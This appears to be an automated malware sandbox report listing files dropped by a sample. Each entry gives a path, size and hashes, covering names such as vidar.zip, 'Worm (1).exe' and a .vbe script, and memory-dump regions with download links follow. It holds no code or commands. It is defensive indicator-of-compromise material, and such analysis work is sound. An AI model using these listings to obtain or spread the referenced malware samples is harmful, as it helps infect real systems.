536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ud.curl.exe

Filesize
565KB

MD5
54075ad554d012f139b7d2ea7ccb7e72

SHA1
54a7ffaf3658addbec2c945a9aeec14d8f5c3e79

SHA256
c82c78bb017655f5d67e1780b4471f6aee04fd7f5ce85f500f9bdee7f21221ba

SHA512
cf82d19fef31bda96427096124a2843123649a69ce25a64e12d2b14a1c901b953bdf3e0d2101944f09976e3b248fbfb1dd07df4999d68c83acaab440b2159798

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]

Filesize
739KB

MD5
382430dd7eae8945921b7feab37ed36b

SHA1
c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128

SHA256
70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b

SHA512
26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]

Filesize
816KB

MD5
7dfbfba1e4e64a946cb096bfc937fbad

SHA1
9180d2ce387314cd4a794d148ea6b14084c61e1b

SHA256
312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94

SHA512
f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe

Filesize
1.6MB

MD5
b4bb269011c062cb169969258ab0e1b9

SHA1
6f17b1266eabfad46eee405f8245c604468a52c5

SHA256
bd1d4e5e6380d4e4c398b3bd1f3bfc20ffa576c004773b1f637fd272b771c125

SHA512
e89088f16658ac3d5d69808080b47638a4f5d699ac3569cc88b07e3a8f4666e89e570cfb4512c161e8ccf9b5537e7ea281fc440b06b7484af33b94f55ecacd43

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe

Filesize
5.4MB

MD5
3c23db5eff4d85d8ff9addb170e32d53

SHA1
1f109f5b9b17a71e4ef7e200fccab72b21836017

SHA256
c2c694174fbf54aa19e05636589ac4eaf81d6b342c96be869bf57da18b930d98

SHA512
ad428facaddaba14acc1979ad6d93c4f665f58b4c9d14b28f2c0c1818290abe9dbbbd4e1c464bd8d38caebb101d6e4e85cf85fdaf423a0f3f5d0d134d8953f69

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe

Filesize
1.3MB

MD5
4a9ffb6962544b4dd55ce6ff568810b7

SHA1
a04a58215250d0bbe79fd946e6f5a73e8be27133

SHA256
8102f6139e928e1e844e7625f41bfa2b65f6ba05e95c43f1ecb329d72a91592b

SHA512
5b7e84b8a49200960a5312a373ef6245c2d997b5e3b9a761cb15a83ffe2edf9dc860c1bcd7ebb9eb7cd774c6f1364d505016446f713acfdfb682bb01c148053b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe

Filesize
1.1MB

MD5
8402ded9b2f0c07d7aca42ffc021faa7

SHA1
3da8599a38ad4c3a51ea4316273d648982aa3161

SHA256
aa8480766448a63a9e7d3f5463ceb7c0539148d42412cfe4ec9572edf97f4bba

SHA512
68e23954f73259708bdc4d384c10442d8d06a40a540758925126e58769b9f6dd3f6f8a3a2beebc28029ba97e657ff173de1dc2ad793f20da0581317df5161d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe

Filesize
2.7MB

MD5
ff461f6e26216dea2575082406f0be8a

SHA1
5f53eb73469d2770308c248b3379c67cdb731f26

SHA256
65046cfd956eb010ea8b5a530e0655cacaa183053ac15dd05003dc0e55904b79

SHA512
b6fbd71229e063433794ab99acd410ec9047f8f504450f19b2b19327bf189da8862c7052df91f97cfe598a03ef4aabe123af8ad378f74294298fcb512dba50d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\vidar.zip

Filesize
1.2MB

MD5
61c89dc8b55c3e28b67e9f086c5930fb

SHA1
3098b3aa47e0180d3c68e5004ea53241ab59e2c7

SHA256
f419cea0dc3b585499f65ff8bdfa33f0a673361d09d1bb81411303fabf5aac1e

SHA512
b08d4c8fca98fdfdedd516ca3f870873441cbca72422bc0f3a53205ecd499f08436e42716a54a8b14b6dd8cb236852548aadc9f9a7f8e82d282caf40e42b8dc1

Download Submit
C:\Windows\302746537.exe

Filesize
22KB

MD5
8703ff2e53c6fd3bc91294ef9204baca

SHA1
3dbb8f7f5dfe6b235486ab867a2844b1c2143733

SHA256
3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035

SHA512
d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

Download Submit
C:\Windows\antivirus-platinum.exe

Filesize
9KB

MD5
cd1800322ccfc425014a8394b01a4b3d

SHA1
171073975effde1c712dfd86309457fd457aed33

SHA256
8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0

SHA512
92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6

Download Submit
C:\winsessionnet\PortwebSaves.exe

Filesize
1.3MB

MD5
ad823965fda5d6901ab6a2bc0e153cee

SHA1
7ebaec14300ef03501785e9bc1637963ebbc49b0

SHA256
2c9a19274f314a4f2f728c51dc117196f7c176c6952275e3ba58184a2d6a95d9

SHA512
1c8897f5abbed300029c229b52c5fefd4ec1731cf71b1463f2a81ee085ea0190d766684b2c3057eb0fa6ddedfe97aae9c6c940bb8cdd90c226c02b406c42f9b9

Download Submit
C:\winsessionnet\kudjk2JZBqNfIbV0H.bat

Filesize
35B

MD5
b57373910e83f55b01da9606c160d606

SHA1
bdd2323421bf54c1ab2a40d2f21710c5ddf6b86e

SHA256
eed136c4973c9c837ba407c3c8dc5d70b9ad30c213628ab93c29649731207065

SHA512
32cd79677e54f51efa739b8b8d33e9834ccb7db05e0d3d56c21383968391007f54f05b92750c9dfc6b98bad362e3dca403f98b20a46e95a51ebdf3da70da1cbc

Download Submit
C:\winsessionnet\qmazbV2JlRldI.vbe

Filesize
207B

MD5
c976abe88c50259f846e4a7f9219c0e4

SHA1
0b8221670e970136114bfa60e95226cdfeda740e

SHA256
c912de4503819861b8f5053c4da777a73279aba052f9d4710cdb9facd62304d7

SHA512
e0fe8084c80f37e57b86fc3110f72acaec2e81dedf6a90488960891c2bd8d30728ec7ad763b7e8be299e56becfdbce93c08004efbe9eab92f9808f6109675715

Download Submit
\??\c:\windows\comctl32.ocx

Filesize
595KB

MD5
821511549e2aaf29889c7b812674d59b

SHA1
3b2fd80f634a3d62277e0508bedca9aae0c5a0d6

SHA256
f59cdf89f0f522ce3662e09fa847bca9b277b006c415dcc0029b416c347db9c4

SHA512
8b2e805b916e5fbfcccb0f4189372aea006789b3847b51018075187135e9b5db9098f704c1932623f356db0ee327e1539a9bf3729947e92844a26db46555e8cd

Download Submit
\??\c:\windows\mscomctl.ocx

Filesize
1.0MB

MD5
714cf24fc19a20ae0dc701b48ded2cf6

SHA1
d904d2fa7639c38ffb6e69f1ef779ca1001b8c18

SHA256
09f126e65d90026c3f659ff41b1287671b8cc1aa16240fc75dae91079a6b9712

SHA512
d375fd9b509e58c43355263753634368fa711f02a2235f31f7fa420d1ff77504d9a29bb70ae31c87671d50bd75d6b459379a1550907fbe5c37c60da835c60bc1

Download Submit
memory/1560-188-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1560-160-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2708-196-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/2708-103-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/2788-178-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/2820-5-0x0000000000400000-0x0000000000626000-memory.dmp

Filesize
2.1MB

Download
memory/3720-140-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/3720-139-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/3720-141-0x0000000000340000-0x0000000000D84000-memory.dmp

Filesize
10.3MB

Download
memory/3720-138-0x00000000033F0000-0x00000000033F1000-memory.dmp

Filesize
4KB

Download
memory/3720-135-0x0000000001530000-0x0000000001531000-memory.dmp

Filesize
4KB

Download
memory/3720-136-0x0000000001540000-0x0000000001541000-memory.dmp

Filesize
4KB

Download
memory/3720-137-0x00000000033E0000-0x00000000033E1000-memory.dmp

Filesize
4KB

Download
memory/3744-116-0x00000000057A0000-0x0000000005D46000-memory.dmp

Filesize
5.6MB

Download
memory/3744-112-0x0000000000700000-0x0000000000852000-memory.dmp

Filesize
1.3MB

Download
memory/3744-163-0x0000000006360000-0x00000000063B0000-memory.dmp

Filesize
320KB

Download
memory/3744-165-0x00000000064B0000-0x00000000065FA000-memory.dmp

Filesize
1.3MB

Download
memory/4500-186-0x0000000000840000-0x000000000098C000-memory.dmp

Filesize
1.3MB

Download
memory/4500-198-0x000000001C270000-0x000000001C2C0000-memory.dmp

Filesize
320KB

Download
memory/4500-201-0x000000001BBE0000-0x000000001BBEA000-memory.dmp

Filesize
40KB

Download
memory/4500-200-0x000000001BBD0000-0x000000001BBDE000-memory.dmp

Filesize
56KB

Download
memory/4500-199-0x000000001BBB0000-0x000000001BBC6000-memory.dmp

Filesize
88KB

Download
memory/4500-197-0x000000001BB90000-0x000000001BBAC000-memory.dmp

Filesize
112KB

Download
memory/4500-189-0x0000000002C30000-0x0000000002C3C000-memory.dmp

Filesize
48KB

Download
memory/4992-214-0x0000000000400000-0x00000000006CB000-memory.dmp

Filesize
2.8MB

Download